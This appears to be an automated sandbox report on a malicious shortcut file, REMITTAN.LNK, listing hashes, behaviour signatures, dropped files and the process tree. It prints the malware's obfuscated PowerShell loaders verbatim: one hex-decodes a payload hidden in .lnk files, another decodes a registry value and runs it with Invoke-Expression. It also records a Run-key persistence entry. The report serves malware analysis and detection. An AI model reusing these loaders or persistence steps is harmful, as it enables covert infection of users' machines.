Analysis
-
max time kernel
1191s -
max time network
1193s -
platform
windows10_x64 -
resource
win10v20210408 -
submitted
27-07-2021 17:40
Static task
static1
Behavioral task
behavioral1
Sample
REMITTAN.LNK
Resource
win7v20210410
Behavioral task
behavioral2
Sample
REMITTAN.LNK
Resource
win10v20210408
General
-
Target
REMITTAN.LNK
-
Size
4.3MB
-
MD5
cc2a7754840911050d768c6be92005a6
-
SHA1
6eb79a31cc322a1a6c4b18bb1c9844108b57313c
-
SHA256
ac8ec0eddd80b41d238c54f1262caefd6e80312826157564e933ff35be63c6cd
-
SHA512
02f3ee8eaad9adaa3baafd39f94f4115fec3d0f97b67a4f8fbf6b342db95681a07eefd2192201d5b8e1d888818b3615d7ff10d77b1f509056091b007f6e541db
Malware Config
Signatures
-
Executes dropped EXE 1 IoCs
Processes:
client.exepid process 580 client.exe -
Loads dropped DLL 1 IoCs
Processes:
rundll32.exepid process 1484 rundll32.exe -
Adds Run key to start application 2 TTPs 1 IoCs
Processes:
powershell.exedescription ioc process Set value (str) \REGISTRY\USER\S-1-5-21-1594587808-2047097707-2163810515-1000\Software\Microsoft\Windows\CurrentVersion\Run\UserPreferencesDefault = "rundll32.exe C:\\Users\\Admin\\AppData\\Roaming\\userpref.dll,main" powershell.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.
-
Suspicious behavior: EnumeratesProcesses 6 IoCs
Processes:
powershell.exepowershell.exepid process 2740 powershell.exe 2740 powershell.exe 2740 powershell.exe 740 powershell.exe 740 powershell.exe 740 powershell.exe -
Suspicious use of AdjustPrivilegeToken 2 IoCs
Processes:
powershell.exepowershell.exedescription pid process Token: SeDebugPrivilege 2740 powershell.exe Token: SeDebugPrivilege 740 powershell.exe -
Suspicious use of WriteProcessMemory 17 IoCs
Processes:
cmd.exepowershell.execsc.execsc.exerundll32.exedescription pid process target process PID 808 wrote to memory of 2740 808 cmd.exe powershell.exe PID 808 wrote to memory of 2740 808 cmd.exe powershell.exe PID 2740 wrote to memory of 1172 2740 powershell.exe csc.exe PID 2740 wrote to memory of 1172 2740 powershell.exe csc.exe PID 1172 wrote to memory of 3648 1172 csc.exe cvtres.exe PID 1172 wrote to memory of 3648 1172 csc.exe cvtres.exe PID 2740 wrote to memory of 60 2740 powershell.exe csc.exe PID 2740 wrote to memory of 60 2740 powershell.exe csc.exe PID 60 wrote to memory of 3912 60 csc.exe cvtres.exe PID 60 wrote to memory of 3912 60 csc.exe cvtres.exe PID 2740 wrote to memory of 580 2740 powershell.exe client.exe PID 2740 wrote to memory of 580 2740 powershell.exe client.exe PID 2740 wrote to memory of 580 2740 powershell.exe client.exe PID 2740 wrote to memory of 1484 2740 powershell.exe rundll32.exe PID 2740 wrote to memory of 1484 2740 powershell.exe rundll32.exe PID 1484 wrote to memory of 740 1484 rundll32.exe powershell.exe PID 1484 wrote to memory of 740 1484 rundll32.exe powershell.exe
Processes
-
C:\Windows\system32\cmd.execmd /c C:\Users\Admin\AppData\Local\Temp\REMITTAN.LNK1⤵
- Suspicious use of WriteProcessMemory
-
C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe"C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy UnRestricted function dS($A) {$kD = $Null;Get-ChildItem $A -Recurse -Depth 1 -ErrorAction 'SilentlyContinue' | ? {$_.extension -eq '.lnk'} | % {$Hu = [String](Get-Content $_.FullName);$Bz = 'QCASPHONCWMSJSYHBDCYJKMQSIABRBQF';$b = $Hu.IndexOf($Bz);if($b -ne -1) {$Ko = $Hu.SubString($b);$kD = $Ko.Replace($Bz,'')}};return $kD};function sH($Gt) {$Bg = [Text.StringBuilder]::New();for($aI=0;$aI -lt $Gt.Length;$aI+=2){[void]$Bg.Append([char][int]('0x'+$Gt.Substring($aI,2)))}return $Bg.ToString()}$kD = dS $(Get-Location).Path;if($kD -eq $Null) {$kD = dS $($env:TEMP)};$e = [ScriptBlock]::Create((sH $kD));$e.Invoke();2⤵
- Adds Run key to start application
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
-
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\gr2o3cdy\gr2o3cdy.cmdline"3⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exeC:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RESA6F4.tmp" "c:\Users\Admin\AppData\Local\Temp\gr2o3cdy\CSCE52AAF24CDF0407F84805CCF7C137CA2.TMP"4⤵
-
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\vwn2mfr1\vwn2mfr1.cmdline"3⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exeC:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RESA9C3.tmp" "c:\Users\Admin\AppData\Local\Temp\vwn2mfr1\CSC7E72E55CB5494975B4299FDB3CB18B.TMP"4⤵
-
C:\Users\Admin\AppData\Roaming\client.exe"C:\Users\Admin\AppData\Roaming\client.exe"3⤵
- Executes dropped EXE
-
C:\Windows\system32\rundll32.exe"C:\Windows\system32\rundll32.exe" C:\Users\Admin\AppData\Roaming\userpref.dll,main3⤵
- Loads dropped DLL
- Suspicious use of WriteProcessMemory
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy UnRestricted $oUa = [string][char[]]@(0x66,0x75,0x6E,0x63,0x74,0x69,0x6F,0x6E,0x23,0x64,0x28,0x24,0x6C,0x29,0x23,0x7B,0x0D,0x0A,0x24,0x49,0x23,0x3D,0x23,0x5B,0x54,0x65,0x78,0x74,0x2E,0x53,0x74,0x72,0x69,0x6E,0x67,0x42,0x75,0x69,0x6C,0x64,0x65,0x72,0x5D,0x3A,0x3A,0x4E,0x65,0x77,0x28,0x29,0x0D,0x0A,0x66,0x6F,0x72,0x28,0x24,0x51,0x3D,0x30,0x3B,0x24,0x51,0x23,0x2D,0x6C,0x74,0x23,0x24,0x6C,0x2E,0x4C,0x65,0x6E,0x67,0x74,0x68,0x3B,0x24,0x51,0x2B,0x3D,0x32,0x29,0x7B,0x0D,0x0A,0x5B,0x76,0x6F,0x69,0x64,0x5D,0x24,0x49,0x2E,0x41,0x70,0x70,0x65,0x6E,0x64,0x28,0x5B,0x43,0x68,0x61,0x72,0x5D,0x5B,0x49,0x6E,0x74,0x5D,0x28,0x27,0x30,0x78,0x27,0x2B,0x24,0x6C,0x2E,0x53,0x75,0x62,0x73,0x74,0x72,0x69,0x6E,0x67,0x28,0x24,0x51,0x2C,0x32,0x29,0x29,0x29,0x7D,0x0D,0x0A,0x72,0x65,0x74,0x75,0x72,0x6E,0x23,0x24,0x49,0x2E,0x54,0x6F,0x53,0x74,0x72,0x69,0x6E,0x67,0x28,0x29,0x7D,0x0D,0x0A,0x66,0x75,0x6E,0x63,0x74,0x69,0x6F,0x6E,0x23,0x76,0x28,0x24,0x4F,0x29,0x23,0x7B,0x0D,0x0A,0x24,0x6C,0x23,0x3D,0x23,0x5B,0x53,0x79,0x73,0x74,0x65,0x6D,0x2E,0x42,0x69,0x74,0x43,0x6F,0x6E,0x76,0x65,0x72,0x74,0x65,0x72,0x5D,0x3A,0x3A,0x54,0x6F,0x53,0x74,0x72,0x69,0x6E,0x67,0x28,0x24,0x4F,0x29,0x0D,0x0A,0x24,0x6C,0x23,0x3D,0x23,0x24,0x6C,0x2E,0x72,0x65,0x70,0x6C,0x61,0x63,0x65,0x28,0x27,0x2D,0x27,0x2C,0x27,0x27,0x29,0x0D,0x0A,0x72,0x65,0x74,0x75,0x72,0x6E,0x23,0x24,0x6C,0x7D,0x0D,0x0A,0x66,0x75,0x6E,0x63,0x74,0x69,0x6F,0x6E,0x23,0x4D,0x28,0x29,0x23,0x7B,0x0D,0x0A,0x24,0x5A,0x23,0x3D,0x23,0x27,0x48,0x4B,0x43,0x55,0x3A,0x5C,0x43,0x6F,0x6E,0x74,0x72,0x6F,0x6C,0x23,0x50,0x61,0x6E,0x65,0x6C,0x5C,0x44,0x65,0x73,0x6B,0x74,0x6F,0x70,0x27,0x0D,0x0A,0x24,0x74,0x23,0x3D,0x23,0x47,0x65,0x74,0x2D,0x49,0x74,0x65,0x6D,0x50,0x72,0x6F,0x70,0x65,0x72,0x74,0x79,0x23,0x2D,0x50,0x61,0x74,0x68,0x23,0x24,0x5A,0x23,0x2D,0x4E,0x61,0x6D,0x65,0x23,0x27,0x55,0x73,0x65,0x72,0x50,0x72,0x65,0x66,0x65,0x72,0x65,0x6E,0x63,0x65,0x73,0x44,0x65,0x66,0x61,0x75,0x6C,0x74,0x27,0x23,0x2D,0x45,0x72,0x72,0x6F,0x72,0x41,0x63,0x74,0x69,0x6F,0x6E,0x23,0x53,0x69,0x6C,0x65,0x6E,0x74,0x6C,0x79,0x43,0x6F,0x6E,0x74,0x69,0x6E,0x75,0x65,0x23,0x7C,0x23,0x53,0x65,0x6C,0x65,0x63,0x74,0x2D,0x4F,0x62,0x6A,0x65,0x63,0x74,0x23,0x2D,0x45,0x78,0x70,0x61,0x6E,0x64,0x23,0x27,0x55,0x73,0x65,0x72,0x50,0x72,0x65,0x66,0x65,0x72,0x65,0x6E,0x63,0x65,0x73,0x44,0x65,0x66,0x61,0x75,0x6C,0x74,0x27,0x0D,0x0A,0x24,0x57,0x23,0x3D,0x23,0x76,0x23,0x24,0x74,0x0D,0x0A,0x24,0x70,0x23,0x3D,0x23,0x64,0x23,0x24,0x57,0x0D,0x0A,0x49,0x6E,0x76,0x6F,0x6B,0x65,0x2D,0x45,0x78,0x70,0x72,0x65,0x73,0x73,0x69,0x6F,0x6E,0x23,0x24,0x70,0x7D,0x0D,0x0A,0x4D) -replace ' ','';$FTX = [string][char[]]@(0x69,0x4E,0x56,0x4F,0x4B,0x65,0x2D,0x65,0x58,0x70,0x72,0x45,0x73,0x73,0x69,0x4F,0x4E) -replace ' ','';sal tWz $FTX;$oUa = $oUa.replace('#', ' ');tWz $oUa4⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
Network
MITRE ATT&CK Matrix ATT&CK v6
Replay Monitor
Loading Replay Monitor...
Downloads
-
C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.logMD5
cd7fb3d11c938541ac33d6fd4089e437
SHA1dcb4c9240c96520dfa600dd31c1f9b1f59564a18
SHA256275f6b0e155160d6c34d9a60887766ceec17fdf2e5ec0088cb293fd92b773cd6
SHA512735a5a41fb938921d87ca078e8fe1194576ab6ab4754eda675a957582ca8acc02639b7caabc60578b8a147f60bc99a0c1e1d943418a4b98dc23a241cb9ed72ae
-
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractiveMD5
11e90a14af29438d79bb05a1bc0c4435
SHA13c6160e71249177d3c904b5be516b1593cbdc1a9
SHA256ce1bdb1a1cc5c5597ea7c295d7044a5f5076163cffb109291703201bad2265e0
SHA512a94ac18320cdef0dab7dae2e67691d89ef08760b630c054d89a3bf00ee0060d45eba15e889da9e26d942d4803e795a01e2e5b214c0ef6fa5d6f7af10e20994ab
-
C:\Users\Admin\AppData\Local\Temp\RESA6F4.tmpMD5
80109eccd7f5926ffbb793ee9a23fde3
SHA1c6bdfeb1e35498ba9ccc73f60b0fe2d7652f720a
SHA256e6e87e8144550fcbf4e81adf94003683b674f0bd8c51728f7e77840e6aa0f6d3
SHA512087e3b909a8b7508921f61cd57023c0e384c2891d0c5b5ee097df702ef539674902b427917c68109449dc0d6a022af5828157379d43dd9d13445a86bcfcff23e
-
C:\Users\Admin\AppData\Local\Temp\RESA9C3.tmpMD5
c9be156faca90ca5330c175facd6fbee
SHA1c97f1624a1307fd7c6ad71f3a85a6671db268fcc
SHA25607ab1e7340b8b954719ce9c25f11527f26f77920effe16d17eddcaf4790bed62
SHA512c1c34190bac066b53d0f4f6740b5e81351c82e748a898b94f0ad08d6312b86acbcd19fc06bd55320de45d06947e595ce68354da6a81b77dcbce774e712d42172
-
C:\Users\Admin\AppData\Local\Temp\gr2o3cdy\gr2o3cdy.dllMD5
9cf0943883366f1e015177edaaa355a3
SHA16d4d1015992ac6bc916afc384302ab2f29671ad0
SHA256decb531e262a7111986259bcd748eef1cc892183d953ef68e17f8aadf6e1c297
SHA5124253fd687201b5d5ec03f0530d885c4dcb50bb7db4bf7296166c8aa9ea92d05df1aa27c0075a1e0862d4a849cddc07e46f6f988d38dfaaa54f1e1fe418b1dbb0
-
C:\Users\Admin\AppData\Local\Temp\vwn2mfr1\vwn2mfr1.dllMD5
666d21bb7a7b9253c450732548830370
SHA12d71ed5f55f873a9bb9f48f3bc1ba6c30cfc8566
SHA25640e48a58693dc878fe85f32ce3e70b067d3cb1fc17737eae33dbd23aba8df051
SHA512730533d7d230d0999eb269a15d629f8442754c2645313db100ae10dae6c6153847a43b6dc703a91e14de2e5493a06bffce033fc1a4e56c4b71a1ec7e387c2865
-
C:\Users\Admin\AppData\Roaming\client.exeMD5
7574d81f10afb1cfdc4ac7acca1bff83
SHA1478389bfdd75704fe7cd5d911514b9649857b798
SHA256263e81885e5402a53346435c091dd904bc77917cfd348d0c7219fe110d10345a
SHA512c34463a21bb28b410f6586c86cfbf2f530da03c7ca705cdb4e383b4cedcd045d8b8fa13e24e49c03876a9b0a6a9ee7a049e5406a6495418df34f34b2ed524585
-
C:\Users\Admin\AppData\Roaming\client.exeMD5
7574d81f10afb1cfdc4ac7acca1bff83
SHA1478389bfdd75704fe7cd5d911514b9649857b798
SHA256263e81885e5402a53346435c091dd904bc77917cfd348d0c7219fe110d10345a
SHA512c34463a21bb28b410f6586c86cfbf2f530da03c7ca705cdb4e383b4cedcd045d8b8fa13e24e49c03876a9b0a6a9ee7a049e5406a6495418df34f34b2ed524585
-
C:\Users\Admin\AppData\Roaming\userpref.dllMD5
5b2e8b0887e41ff72ac66799beeccb90
SHA182bbe01b7a2cb252892a5bed5d5af58fb641cd38
SHA256739d52cf78560ab2c1dcd0f272006549d15312f0dcccc420bf669717422da441
SHA5123ec6ef1bcdc2472e1edb1ecf578496a1194ef0e8de50bc47b270d6b23955ea7250c268b7bbe109b8b5df3c2610c952b59bd7ced6823dc22215183d53e7ad7e53
-
\??\c:\Users\Admin\AppData\Local\Temp\gr2o3cdy\CSCE52AAF24CDF0407F84805CCF7C137CA2.TMPMD5
78a449d2c0e2ccb43faf18fed32dca30
SHA10c02e1fd4ef2da744dcc2ea52caa12ab970902c8
SHA2561c04f39a87d5429a7d4e35b8480b3502ba533b4ae79222c7d61d8ffcd64df695
SHA51254ee7c9cc540343b71650e0e3df2f2f667338977b2741ae8a5d1ee0ac47f390cde046b36aa85bb16be177842b3e7d428b6673849a70d62960c9019c546366641
-
\??\c:\Users\Admin\AppData\Local\Temp\gr2o3cdy\gr2o3cdy.0.csMD5
c0136606a60235ac4eedf5ebfbf72242
SHA13adc968e7d42959b5b6892ad9836b9e5a7a80247
SHA25636a3409023121f56e60418e19521f1241ee5ab41b8c299d04c53fe63a83a054f
SHA5121c09303dc198f6cd9d2f2f73290089f3d4056379e4f76ec081871b06b920b5e548b017a047eeadcb535761f5c436f6a4abec7a848337c1fe65209d9cf43abaed
-
\??\c:\Users\Admin\AppData\Local\Temp\gr2o3cdy\gr2o3cdy.cmdlineMD5
17b4e57d6258569b80d58f485a6883c1
SHA1532fbcc07ead4c5e52445bd897831cf5c32a8180
SHA256943413d988e6a9625ba9b430c05392b7e8f173d41da993a6caa091e116501cc9
SHA5121aa38af857867c9f8454822788aacc01380d500195440c0475403f24cdbbe5247e3b37395879cb0f1f47c1f6b6d3c5bc439ac72f5ccb21551ae4666cbeef0710
-
\??\c:\Users\Admin\AppData\Local\Temp\vwn2mfr1\CSC7E72E55CB5494975B4299FDB3CB18B.TMPMD5
d07751958882403469822ca11b3224dc
SHA1bf949bcdbf14a64deac3b950b38689d84f036ac1
SHA2565746a4009ae4fd2da725c809613f99e4f4ea16dfa92429e9d70acb3acf0aa0c1
SHA5124785ce7d35a2d6e9841704bc747a1488e74ca4a7d24ed62d2a28a4aa0bd65ee00bc36ef1e4d7f7924fdfe3d69c9ecdb726fc1c862e9b770fb65a50b4b63a3452
-
\??\c:\Users\Admin\AppData\Local\Temp\vwn2mfr1\vwn2mfr1.0.csMD5
7e8be7de46cb8a991a864885286e1db9
SHA1600af06d154bc655d186b295205542a049957ae8
SHA2562d66ad50bdbe759adf78a4f7de6f39c4d98b49ad83083eae1ea95130affa9ac4
SHA512b0b01f8cad3150c16dbcc198ad15ed2c117bbfcfd5969438646b7c10de95939f238775e0faf7404e633232cfee55281a25b8d3762c0542cb3d2df9def4ba9653
-
\??\c:\Users\Admin\AppData\Local\Temp\vwn2mfr1\vwn2mfr1.cmdlineMD5
f02c668c8c79e89880c7fdfc0133ff96
SHA102e191ddf50ef2593110b1604d8bdb84b6b7e311
SHA2562ea32315c363303b3619f2241b9dd31e619129b8bb50ad583eb386f13ce3c5e7
SHA5129b915869cafa6ca53066de0d7af2ede052a5950bb566859243bf49486251bd9d268350c49311890d728149e0ae79faf4c8c6d403dee31bb06c65a3f360c092a7
-
\Users\Admin\AppData\Roaming\userpref.dllMD5
5b2e8b0887e41ff72ac66799beeccb90
SHA182bbe01b7a2cb252892a5bed5d5af58fb641cd38
SHA256739d52cf78560ab2c1dcd0f272006549d15312f0dcccc420bf669717422da441
SHA5123ec6ef1bcdc2472e1edb1ecf578496a1194ef0e8de50bc47b270d6b23955ea7250c268b7bbe109b8b5df3c2610c952b59bd7ced6823dc22215183d53e7ad7e53
-
memory/60-153-0x0000000000000000-mapping.dmp
-
memory/580-179-0x00000000007E0000-0x00000000007E1000-memory.dmpFilesize
4KB
-
memory/580-166-0x0000000000000000-mapping.dmp
-
memory/580-215-0x0000000000800000-0x000000000081A000-memory.dmpFilesize
104KB
-
memory/740-213-0x00000196F6F96000-0x00000196F6F98000-memory.dmpFilesize
8KB
-
memory/740-192-0x00000196F6F93000-0x00000196F6F95000-memory.dmpFilesize
8KB
-
memory/740-190-0x00000196F6F90000-0x00000196F6F92000-memory.dmpFilesize
8KB
-
memory/740-176-0x0000000000000000-mapping.dmp
-
memory/1172-137-0x0000000000000000-mapping.dmp
-
memory/1484-172-0x0000000000000000-mapping.dmp
-
memory/2740-123-0x0000021772CB0000-0x0000021772CB1000-memory.dmpFilesize
4KB
-
memory/2740-124-0x00000217720B0000-0x00000217720B2000-memory.dmpFilesize
8KB
-
memory/2740-125-0x00000217720B3000-0x00000217720B5000-memory.dmpFilesize
8KB
-
memory/2740-132-0x00000217720B6000-0x00000217720B8000-memory.dmpFilesize
8KB
-
memory/2740-161-0x00000217720B8000-0x00000217720B9000-memory.dmpFilesize
4KB
-
memory/2740-144-0x0000021772C70000-0x0000021772C71000-memory.dmpFilesize
4KB
-
memory/2740-119-0x00000217721C0000-0x00000217721C1000-memory.dmpFilesize
4KB
-
memory/2740-160-0x0000021772C80000-0x0000021772C81000-memory.dmpFilesize
4KB
-
memory/2740-114-0x0000000000000000-mapping.dmp
-
memory/3648-140-0x0000000000000000-mapping.dmp
-
memory/3912-156-0x0000000000000000-mapping.dmp